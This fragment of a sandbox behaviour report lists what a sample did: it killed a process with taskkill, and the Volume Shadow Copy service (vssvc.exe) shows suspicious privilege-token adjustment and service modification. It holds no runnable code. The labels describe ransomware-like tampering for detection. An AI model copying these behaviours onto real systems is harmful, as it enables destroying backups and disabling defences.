- Kills process with taskkill
PID:580
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
- Modifies service
PID:532